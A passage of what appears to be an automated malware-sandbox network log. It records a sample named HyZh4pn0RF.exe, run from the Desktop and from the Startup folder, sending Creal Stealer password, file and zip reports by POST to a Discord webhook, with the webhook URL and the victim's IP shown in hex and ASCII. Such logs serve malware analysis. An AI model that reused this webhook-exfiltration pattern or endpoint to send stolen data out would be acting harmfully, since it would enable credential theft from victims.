26-Sep-2029 16:19:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=e61c2e80841d69c8d2221fd32020837f94fe0ef7-1727453948; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:19:08 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 76 49 36 65 45 61 33 46 73 4f 34 32 31 4b 30 43 55 55 69 49 43 69 4b 51 37 2e 78 72 50 31 65 54 76 42 52 6f 6e 65 6e 31 59 53 51 2d 31 37 32 37 34 35 33 39 34 38 30 34 39 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 34 36 64 64 38 37 37 32 37 31 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=vI6eEa3FsO421K0CUUiICiKQ7.xrP1eTvBRonen1YSQ-1727453948049-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd046dd877271-EWR
2024-09-27 16:19:08 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.8	49762	162.159.136.232	443	4040	C:\Users\user\Desktop\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:07 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 506 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:07 UTC	506	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 6e 61 6d 65 22 3a 20 22 49 6e 74 65 72 65 73 74 69 6e 67 20 66 69 6c 65 73 20 66 6f 75 6e 64 20 6f 6e 20 75 73 65 72 20 50 43 3a 22 2c 20 22 76 61 6c 75 65 22 3a 20 22 5c 6e 22 7d 5d 2c 20 22 61 75 74 68 6f 72 22 3a 20 7b 22 6e 61 6d 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 46 69 6c 65 20 53 74 65 61 6c 65 72 22 7d 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"color": 2895667, "fields": [{"name": "Interesting files found on user PC:", "value": "\n"}], "author": {"name": "Creal \| File Stealer"}, "footer": {"text": "Creal Stealer \| ht
2024-09-27 16:19:08 UTC	1251	IN	HTTP/1.1 429 Too Many Requests Date: Fri, 27 Sep 2024 16:19:08 GMT Content-Type: application/json Content-Length: 79 Connection: close retry-after: 1679 x-ratelimit-scope: user set-cookie: __dcfduid=38e46f0a7cec11efa7c9a6a6d338c935; Expires=Wed, 26-Sep-2029 16:19:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 0 x-ratelimit-reset: 1727453950 x-ratelimit-reset-after: 2 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ckv%2BFC3toF6gD3Mu6UeiYUBUM8klcCDgvQ1X52JClerSN6OGE1XOcD%2FsvU4H8ObtpwYmgqxG6z8EnVOpxLqlMEnQUqRXfoCZ34NzR5u4VeSLw3iTtM%2FYjRbCuML4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=38e46f0a7cec11efa7c9a6a6d338c935e660db62275a48353f4e5be22d8fbb0e2212ec9bd491b71c4ff50d5dd973be7a; Expires=Wed, 26-Sep-2029 16:19:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
2024-09-27 16:19:08 UTC	347	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 72 75 69 64 3d 65 36 31 63 32 65 38 30 38 34 31 64 36 39 63 38 64 32 32 32 31 66 64 33 32 30 32 30 38 33 37 66 39 34 66 65 30 65 66 37 2d 31 37 32 37 34 35 33 39 34 38 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 45 52 5a 66 51 4b 6d 6b 4e 74 72 76 65 52 74 43 48 58 42 4a 6c 5a 33 4d 67 45 70 59 70 45 4a 34 59 42 46 79 35 64 55 4f 38 74 6b 2d 31 37 32 37 34 35 33 39 34 38 30 35 31 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 Data Ascii: Set-Cookie: __cfruid=e61c2e80841d69c8d2221fd32020837f94fe0ef7-1727453948; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneSet-Cookie: _cfuvid=ERZfQKmkNtrveRtCHXBJlZ3MgEpYpEJ4YBFy5dUO8tk-1727453948051-0.0.1.1-604800000; path=/; domain=.discor
2024-09-27 16:19:08 UTC	79	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 61 74 65 20 6c 69 6d 69 74 65 64 2e 22 2c 20 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 20 30 2e 33 2c 20 22 67 6c 6f 62 61 6c 22 3a 20 66 61 6c 73 65 7d Data Ascii: {"message": "You are being rate limited.", "retry_after": 0.3, "global": false}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.8	49763	162.159.136.232	443	5340	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:08 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 649 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:08 UTC	649	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 50 61 73 73 77 6f 72 64 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 2a 2a 3a 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 61 3a 68 69 72 61 5f 6b 61 73 61 61 6e 61 68 74 61 72 69 3a 38 38 36 39 34 32 38 35 36 39 36 39 38 37 35 34 37 36 3e 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal \| Password Stealer", "description": "<:apollondelirmis:1012370180845883493>: Accounts:\n\n\nData:\n<a:hira_kasaanahtari:886942856969875476> \u2022 0
2024-09-27 16:19:08 UTC	1331	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:19:08 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=38fb081e7cec11efa015ce5421a2957b; Expires=Wed, 26-Sep-2029 16:19:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 0 x-ratelimit-reset: 1727453951 x-ratelimit-reset-after: 2 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i8qi0QFieyFHr5IzCu7iUGCIMOcleG7k7VWtvX8gM2MWG%2ByJ3KUPvgpsxbCYKMu2yMm7yXI7jR2jA8nECf5LQtaNfoFngVO552bbszKoLCgYRgOMRG1MgjxY7lP5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=38fb081e7cec11efa015ce5421a2957b0482c3917c8f9110c39af5c875593f193ecc1f3171e117b55844e2ef89dcc1f1; Expires=Wed, 26-Sep-2029 16:19:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=e61c2e80841d69c8d2221fd32020837f94fe0ef7-1727453948; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:19:08 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 63 75 68 78 6c 6a 34 61 62 43 59 67 50 4b 6e 67 6c 4c 39 68 75 4f 70 57 32 33 57 62 47 4d 63 39 53 45 76 41 49 5a 71 57 58 56 4d 2d 31 37 32 37 34 35 33 39 34 38 32 30 32 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 34 37 65 62 65 64 31 61 34 34 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=cuhxlj4abCYgPKnglL9huOpW23WbGMc9SEvAIZqWXVM-1727453948202-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd047ebed1a44-EWR
2024-09-27 16:19:08 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.8	49765	162.159.136.232	443	5340	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:08 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 431 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:08 UTC	431	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 5a 69 70 73 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 43 72 65 61 6c 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 41 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal Zips", "description": "\n\n", "color": 2895667, "footer": {"text": "Creal Stealer \| https://t.me/CrealStealer", "icon_url": "https://raw.githubusercontent.com/A
2024-09-27 16:19:08 UTC	1335	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:19:08 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=394a31c87cec11ef80916ec6ea4fc16e; Expires=Wed, 26-Sep-2029 16:19:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 0 x-ratelimit-reset: 1727453951 x-ratelimit-reset-after: 2 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pGEykrVebyMU%2FTzJ10ycn7GWwQAUrymWlSKk%2F70JA%2FlePm5eoVmZU1HHLwgsCm6rrJHYDh3355GH6XcZdT810MgSfr0yw2ZG5I4SaCJxvDNvEsQrKEYPETcTCHiI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=394a31c87cec11ef80916ec6ea4fc16eeb68a171fda8c701c44612801a047c2ff379b8173eabdaf48ef4e3bcc99742c0; Expires=Wed, 26-Sep-2029 16:19:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=e61c2e80841d69c8d2221fd32020837f94fe0ef7-1727453948; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:19:08 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 73 78 58 4f 4e 50 62 54 32 54 76 6b 2e 59 71 32 6b 4a 57 53 51 36 73 6d 79 6e 79 59 6c 42 76 63 32 51 46 59 63 4c 4f 39 72 44 6f 2d 31 37 32 37 34 35 33 39 34 38 37 31 39 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 34 62 30 65 34 31 31 38 32 64 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=sxXONPbT2Tvk.Yq2kJWSQ6smynyYlBvc2QFYcLO9rDo-1727453948719-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd04b0e41182d-EWR
2024-09-27 16:19:08 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.8	49764	162.159.136.232	443	4040	C:\Users\user\Desktop\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:08 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 506 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:08 UTC	506	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 6e 61 6d 65 22 3a 20 22 49 6e 74 65 72 65 73 74 69 6e 67 20 66 69 6c 65 73 20 66 6f 75 6e 64 20 6f 6e 20 75 73 65 72 20 50 43 3a 22 2c 20 22 76 61 6c 75 65 22 3a 20 22 5c 6e 22 7d 5d 2c 20 22 61 75 74 68 6f 72 22 3a 20 7b 22 6e 61 6d 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 46 69 6c 65 20 53 74 65 61 6c 65 72 22 7d 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"color": 2895667, "fields": [{"name": "Interesting files found on user PC:", "value": "\n"}], "author": {"name": "Creal \| File Stealer"}, "footer": {"text": "Creal Stealer \| ht
2024-09-27 16:19:08 UTC	1255	IN	HTTP/1.1 429 Too Many Requests Date: Fri, 27 Sep 2024 16:19:08 GMT Content-Type: application/json Content-Length: 79 Connection: close retry-after: 1803 x-ratelimit-scope: user set-cookie: __dcfduid=394a83627cec11ef924672506fccbbd5; Expires=Wed, 26-Sep-2029 16:19:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 0 x-ratelimit-reset: 1727453951 x-ratelimit-reset-after: 2 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OrPgcQJrMCYTbmvN4BVIlT%2BZ%2B0HHGcPuWujAUUf%2B%2BmHBG650zRMmS402Tne1FpwJlMYEzEIOO1u2JB1nQqyt6cFBD%2Ba4rxsnpiySPjARtxJRBKiRMDyAdI6akul6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=394a83627cec11ef924672506fccbbd5d6909740035859ddfc8c1c677564571ea3c3f000b3eb473738cdbd43d6da4044; Expires=Wed, 26-Sep-2029 16:19:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
2024-09-27 16:19:08 UTC	347	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 72 75 69 64 3d 65 36 31 63 32 65 38 30 38 34 31 64 36 39 63 38 64 32 32 32 31 66 64 33 32 30 32 30 38 33 37 66 39 34 66 65 30 65 66 37 2d 31 37 32 37 34 35 33 39 34 38 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 46 35 69 58 6b 79 44 67 66 44 79 69 5f 77 34 57 30 4e 50 33 55 6e 4b 77 78 64 4e 37 46 68 4b 49 4d 36 35 32 77 49 53 51 5f 58 6b 2d 31 37 32 37 34 35 33 39 34 38 37 32 30 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 Data Ascii: Set-Cookie: __cfruid=e61c2e80841d69c8d2221fd32020837f94fe0ef7-1727453948; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneSet-Cookie: _cfuvid=F5iXkyDgfDyi_w4W0NP3UnKwxdN7FhKIM652wISQ_Xk-1727453948720-0.0.1.1-604800000; path=/; domain=.discor
2024-09-27 16:19:08 UTC	79	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 61 74 65 20 6c 69 6d 69 74 65 64 2e 22 2c 20 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 20 30 2e 33 2c 20 22 67 6c 6f 62 61 6c 22 3a 20 66 61 6c 73 65 7d Data Ascii: {"message": "You are being rate limited.", "retry_after": 0.3, "global": false}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.8	49766	162.159.136.232	443	5340	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:08 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 649 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:08 UTC	649	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 50 61 73 73 77 6f 72 64 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 2a 2a 3a 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 61 3a 68 69 72 61 5f 6b 61 73 61 61 6e 61 68 74 61 72 69 3a 38 38 36 39 34 32 38 35 36 39 36 39 38 37 35 34 37 36 3e 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal \| Password Stealer", "description": "<:apollondelirmis:1012370180845883493>: Accounts:\n\n\nData:\n<a:hira_kasaanahtari:886942856969875476> \u2022 0
2024-09-27 16:19:08 UTC	1251	IN	HTTP/1.1 429 Too Many Requests Date: Fri, 27 Sep 2024 16:19:08 GMT Content-Type: application/json Content-Length: 79 Connection: close retry-after: 1678 x-ratelimit-scope: user set-cookie: __dcfduid=395d76667cec11ef9680ae4c9400efeb; Expires=Wed, 26-Sep-2029 16:19:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 0 x-ratelimit-reset: 1727453951 x-ratelimit-reset-after: 2 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C7FwWHEuHA0ROu3gDo81hPf7BpsuFXhMj%2BrBGvFDtThBriSA7teLHcyN5brcsKJ5s9Ea4Vgs4xw2p94H%2F5Z2wglb%2FfCFESgGqoASgBqEZjSbxZdOS610U41Hfvlg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=395d76667cec11ef9680ae4c9400efeb1554af985a6a1c95b8a86e5605929253f0e955ac538fbe30d64ea6b22550fca0; Expires=Wed, 26-Sep-2029 16:19:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
2024-09-27 16:19:08 UTC	347	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 72 75 69 64 3d 65 36 31 63 32 65 38 30 38 34 31 64 36 39 63 38 64 32 32 32 31 66 64 33 32 30 32 30 38 33 37 66 39 34 66 65 30 65 66 37 2d 31 37 32 37 34 35 33 39 34 38 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 55 67 79 38 6f 2e 59 4d 4c 57 5a 4d 51 76 77 6d 68 4c 41 78 61 36 33 54 6f 7a 59 79 64 57 69 62 6a 35 5f 38 4d 33 78 75 6e 33 6f 2d 31 37 32 37 34 35 33 39 34 38 38 34 35 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 Data Ascii: Set-Cookie: __cfruid=e61c2e80841d69c8d2221fd32020837f94fe0ef7-1727453948; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneSet-Cookie: _cfuvid=Ugy8o.YMLWZMQvwmhLAxa63TozYydWibj5_8M3xun3o-1727453948845-0.0.1.1-604800000; path=/; domain=.discor
2024-09-27 16:19:08 UTC	79	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 61 74 65 20 6c 69 6d 69 74 65 64 2e 22 2c 20 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 20 30 2e 33 2c 20 22 67 6c 6f 62 61 6c 22 3a 20 66 61 6c 73 65 7d Data Ascii: {"message": "You are being rate limited.", "retry_after": 0.3, "global": false}

